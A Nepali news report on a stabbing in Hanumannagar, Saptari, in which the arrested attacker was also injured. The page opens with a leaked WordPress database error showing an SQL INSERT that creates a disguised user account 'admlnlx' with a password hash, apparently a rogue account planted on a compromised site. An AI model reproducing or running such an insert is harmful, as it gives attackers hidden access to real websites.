WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAkac.oG/3NLvYekDwzrTMQp73VqTx1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-17 16:07:46', '', 'admlnlx', 'admlnlx')
सप्तरी, माघ ५–
सप्तरीको हनुमाननगर योगिनिमाई नगरपालिका–४ स्थित इनरुवामा गएराति छुरा प्रहारबाट एकजना युवक गम्भीर घाइते भएका छन् ।
स्थानीय २५ वर्षीय मनोजकुमार मण्डलले सोही ठाउँ बस्ने बुधन शारदारलाई छुरा प्रहार गरेका हुन् । मादक पदार्थ सेवनबाट मातेका उनले शारदारको पछाडिपट्टिको ढाडमा छुरा प्रहार गरेको प्रहरीले जनाएको छ ।
छुरा प्रहारबाट गम्भीर घाइते युवकको उपचारका लागि धरानस्थित बिपी कोइराला स्वास्थ्य विज्ञान प्रतिष्ठान पठाइएको इलाका प्रहरी कार्यालय हनुमाननगरले जनाएको छ ।
यता छुरा प्रहार गर्ने मण्डललाई प्रहरीले पक्राउ गरेको छ । पक्राउ परेका मण्डल समेत घाइते भएकाले उपचारको लागि राजविराजस्थित गजेन्द्रनारायण सिंह सगरमाथा अञ्चल अस्पतालमा भर्ना गरिएको जिल्ला प्रहरी कार्यालय सप्तरी जनाएको छ ।
कुन कारणले छुरा प्रहार भएको खुल्न नसकेको तथा मादक पदार्थ सेवन गरेर दुवै जनाले एकापसमा छुरा प्रहार गरेको हुनसक्ने प्रहरीले अनुमान गरेको छ ।